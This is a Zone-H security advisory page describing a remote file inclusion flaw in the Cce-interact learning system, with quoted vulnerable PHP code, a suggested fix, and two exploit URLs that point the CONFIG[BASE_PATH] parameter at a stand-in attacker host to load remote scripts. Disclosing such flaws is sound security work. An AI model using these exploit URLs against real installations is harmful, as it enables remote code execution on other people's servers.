Zone-H
Home arrow Avisos de Segurança arrow Interact NFIG[BASE_PATH]) Inclusão de arquivos remotos
06 de October de 2008
  
 
Ataques desta semana
O.S.  Defs.  %
Linux  10839  74.77%
Win 2003  2544  17.55%
Win 2000  693  4.78%
FreeBSD  282  1.95%
SolarisSunOS  47  0.32%
Other  92  0.63%

Total de ataques: 14497 dos quais 4063 único(s) no ip e 10434 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Interact NFIG[BASE_PATH]) Inclusão de arquivos remotos Imprimir E-mail
Avaliação do Usuário: / 1
PiorMelhor 
Por Marcelo Almeida (Vympel)   
30 de August de 2006
Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - -
Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Inclusão de arquivos remotos
[Script name: Interact - Online Learning and Collaboration System v. 2.2.0
[Script site: https://sourceforge.net/projects/cce-interact/
Encontrado por: CarcaBot
Contato: CarcaBotx_at_yahoo.com
Página com falha => admin/autoprompter.php line 33-38: ...

require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');

$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,
{$CONFIG['DB_PREFIX']}posts.subject,
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key
WHERE
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key
AND
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey
AND
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey
AND
{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL
{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND
{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY
{$CONFIG['DB_PREFIX']}posts.post_key");

....
Fix Exploit:
admin/autoprompter.php line 33-38:
....
require_once('../local/config.inc.php');
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');

$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,
{$CONFIG['DB_PREFIX']}posts.subject,
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key
WHERE
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key
AND
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey
AND
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey
AND
{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL
{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND
{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY
{$CONFIG['DB_PREFIX']}posts.post_key");

....
vulnerable code => includes/common.inc.php line 35-40:
....

$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');

....
Exploit Fix:
includes/common.inc.php line 35-40:
....

require_once('../local/config.inc.php');
$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');

*/
#Exploit:

http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]

http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]
### End of File ###
### http://Hacking.CarcaBot.ro ###

 

 
< Anterior   Próximo >
[Voltar]
 
Top!
(C) 2008 Zone-H - Unrestricted Information
Top!